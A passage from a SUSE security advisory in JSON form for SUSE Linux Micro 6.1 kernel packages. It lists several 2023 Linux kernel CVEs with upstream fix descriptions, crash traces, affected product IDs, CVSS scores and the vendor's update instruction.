"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54052",
"url": "https://www.suse.com/security/cve/CVE-2023-54052"
},
{
"category": "external",
"summary": "SUSE Bug 1256387 for CVE-2023-54052",
"url": "https://bugzilla.suse.com/1256387"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54052"
},
{
"cve": "CVE-2023-54060",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54060"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Set end correctly when doing batch carry\n\nEven though the test suite covers this it somehow became obscured that\nthis wasn\u0027t working.\n\nThe test iommufd_ioas.mock_domain.access_domain_destory would blow up\nrarely.\n\nend should be set to 1 because this just pushed an item, the carry, to the\npfns list.\n\nSometimes the test would blow up with:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP\n CPU: 5 PID: 584 Comm: iommufd Not tainted 6.5.0-rc1-dirty #1236\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:batch_unpin+0xa2/0x100 [iommufd]\n Code: 17 48 81 fe ff ff 07 00 77 70 48 8b 15 b7 be 97 e2 48 85 d2 74 14 48 8b 14 fa 48 85 d2 74 0b 40 0f b6 f6 48 c1 e6 04 48 01 f2 \u003c48\u003e 8b 3a 48 c1 e0 06 89 ca 48 89 de 48 83 e7 f0 48 01 c7 e8 96 dc\n RSP: 0018:ffffc90001677a58 EFLAGS: 00010246\n RAX: 00007f7e2646f000 RBX: 0000000000000000 RCX: 0000000000000001\n RDX: 0000000000000000 RSI: 00000000fefc4c8d RDI: 0000000000fefc4c\n RBP: ffffc90001677a80 R08: 0000000000000048 R09: 0000000000000200\n R10: 0000000000030b98 R11: ffffffff81f3bb40 R12: 0000000000000001\n R13: ffff888101f75800 R14: ffffc90001677ad0 R15: 00000000000001fe\n FS: 00007f9323679740(0000) GS:ffff8881ba540000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000000105ede003 CR4: 00000000003706a0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? show_regs+0x5c/0x70\n ? __die+0x1f/0x60\n ? page_fault_oops+0x15d/0x440\n ? lock_release+0xbc/0x240\n ? exc_page_fault+0x4a4/0x970\n ? asm_exc_page_fault+0x27/0x30\n ? batch_unpin+0xa2/0x100 [iommufd]\n ? batch_unpin+0xba/0x100 [iommufd]\n __iopt_area_unfill_domain+0x198/0x430 [iommufd]\n ? __mutex_lock+0x8c/0xb80\n ? __mutex_lock+0x6aa/0xb80\n ? xa_erase+0x28/0x30\n ? iopt_table_remove_domain+0x162/0x320 [iommufd]\n ? lock_release+0xbc/0x240\n iopt_area_unfill_domain+0xd/0x10 [iommufd]\n iopt_table_remove_domain+0x195/0x320 [iommufd]\n iommufd_hw_pagetable_destroy+0xb3/0x110 [iommufd]\n iommufd_object_destroy_user+0x8e/0xf0 [iommufd]\n iommufd_device_detach+0xc5/0x140 [iommufd]\n iommufd_selftest_destroy+0x1f/0x70 [iommufd]\n iommufd_object_destroy_user+0x8e/0xf0 [iommufd]\n iommufd_destroy+0x3a/0x50 [iommufd]\n iommufd_fops_ioctl+0xfb/0x170 [iommufd]\n __x64_sys_ioctl+0x40d/0x9a0\n do_syscall_64+0x3c/0x80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54060",
"url": "https://www.suse.com/security/cve/CVE-2023-54060"
},
{
"category": "external",
"summary": "SUSE Bug 1256379 for CVE-2023-54060",
"url": "https://bugzilla.suse.com/1256379"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54060"
},
{
"cve": "CVE-2023-54064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi:ssif: Fix a memory leak when scanning for an adapter\n\nThe adapter scan ssif_info_find() sets info-\u003eadapter_name if the adapter\ninfo came from SMBIOS, as it\u0027s not set in that case. However, this\nfunction can be called more than once, and it will leak the adapter name\nif it had already been set. So check for NULL before setting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54064",
"url": "https://www.suse.com/security/cve/CVE-2023-54064"
},
{
"category": "external",
"summary": "SUSE Bug 1256375 for CVE-2023-54064",
"url": "https://bugzilla.suse.com/1256375"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54064"
},
{
"cve": "CVE-2023-54066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb-v2: gl861: Fix null-ptr-deref in gl861_i2c_master_xfer\n\nIn gl861_i2c_master_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach gl861_i2c_master_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54066",
"url": "https://www.suse.com/security/cve/CVE-2023-54066"
},
{
"category": "external",
"summary": "SUSE Bug 1256373 for CVE-2023-54066",
"url": "https://bugzilla.suse.com/1256373"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54066"
},
{
"cve": "CVE-2023-54067",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54067"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting free space root from the dirty cow roots list\n\nWhen deleting the free space tree we are deleting the free space root\nfrom the list fs_info-\u003edirty_cowonly_roots without taking the lock that\nprotects it, which is struct btrfs_fs_info::trans_lock.\nThis unsynchronized list manipulation may cause chaos if there\u0027s another\nconcurrent manipulation of this list, such as when adding a root to it\nwith ctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \u003cTASK\u003e\n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? __x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe free space root from that list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54067",
"url": "https://www.suse.com/security/cve/CVE-2023-54067"
},
{
"category": "external",
